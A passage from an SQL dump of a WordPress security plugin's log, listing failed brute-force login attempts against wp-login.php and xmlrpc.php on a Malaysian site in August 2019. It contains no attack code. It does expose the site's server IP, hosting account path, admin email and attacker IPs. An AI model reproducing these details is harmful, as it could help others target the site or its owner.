empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"195.8.208.168\";s:11:\"REMOTE_PORT\";s:5:\"49352\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPAmMc7g4l7i3TBndWchQAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566818460.5596\";s:12:\"REQUEST_TIME\";s:10:\"1566818460\";}}','notice','2019-08-26 11:21:02','2019-08-26 11:21:01',17682880,19174552,'https://bintara.com.my/wp-login.php',1,0,'195.8.208.168'),(23122,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"195.8.208.168\";s:11:\"REMOTE_PORT\";s:5:\"50588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPAoMc7g4l7i3TBndWchgAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566818468.3213\";s:12:\"REQUEST_TIME\";s:10:\"1566818468\";}}','notice','2019-08-26 11:21:10','2019-08-26 11:21:08',18196312,19495960,'https://bintara.com.my/xmlrpc.php',1,0,'195.8.208.168'),(23119,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"185.2.5.13\";s:11:\"REMOTE_PORT\";s:5:\"56165\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO@WMc7g4l7i3TBndWbgQAAAFU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566817882.4795\";s:12:\"REQUEST_TIME\";s:10:\"1566817882\";}}','notice','2019-08-26 11:11:23','2019-08-26 11:11:22',17680288,19171880,'https://bintara.com.my/wp-login.php',1,0,'185.2.5.13'),(23123,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"107.170.194.74\";s:11:\"REMOTE_PORT\";s:5:\"40942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPCc8c7g4l7i3TBndWdQgAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566818931.1175\";s:12:\"REQUEST_TIME\";s:10:\"1566818931\";}}','notice','2019-08-26 11:28:52','2019-08-26 11:28:51',17684392,19175600,'https://bintara.com.my/wp-login.php',1,0,'107.170.194.74'),(23120,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"185.2.5.13\";s:11:\"REMOTE_PORT\";s:5:\"57461\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWO@Xcc7g4l7i3TBndWbhAAAAFg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566817885.5239\";s:12:\"REQUEST_TIME\";s:10:\"1566817885\";}}','notice','2019-08-26 11:11:26','2019-08-26 11:11:25',18201744,19499400,'https://bintara.com.my/xmlrpc.php',1,0,'185.2.5.13'),(23124,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"199.114.216.133\";s:11:\"REMOTE_PORT\";s:5:\"46956\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPEsMc7g4l7i3TBndWeAwAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566819504.3742\";s:12:\"REQUEST_TIME\";s:10:\"1566819504\";}}','notice','2019-08-26 11:38:26','2019-08-26 11:38:24',17686616,19178696,'https://bintara.com.my/wp-login.php',1,0,'199.114.216.133'),(23125,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"3.90.158.241\";s:11:\"REMOTE_PORT\";s:5:\"34096\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPHBklLQKVpx7Mms7vJmwAAAdQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566820102.9918\";s:12:\"REQUEST_TIME\";s:10:\"1566820102\";}}','notice','2019-08-26 11:48:24','2019-08-26 11:48:23',17683832,19173856,'https://bintara.com.my/wp-login.php',1,0,'3.90.158.241'),(23126,0,'brute_force','invalid-login::username-private','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"private\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"3.90.158.241\";s:11:\"REMOTE_PORT\";s:5:\"34800\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPHC8c7g4l7i3TBndWe6QAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566820107.5303\";s:12:\"REQUEST_TIME\";s:10:\"1566820107\";}}','notice','2019-08-26 11:48:29','2019-08-26 11:48:27',18201784,19498464,'https://bintara.com.my/xmlrpc.php',1,0,'3.90.158.241'),(23127,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.109.77\";s:11:\"REMOTE_PORT\";s:5:\"53586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPJXcc7g4l7i3TBndWfzwAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566820701.6518\";s:12:\"REQUEST_TIME\";s:10:\"1566820701\";}}','notice','2019-08-26 11:58:24','2019-08-26 11:58:22',17684776,19175360,'https://bintara.com.my/wp-login.php',1,0,'150.95.109.77'),(23128,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 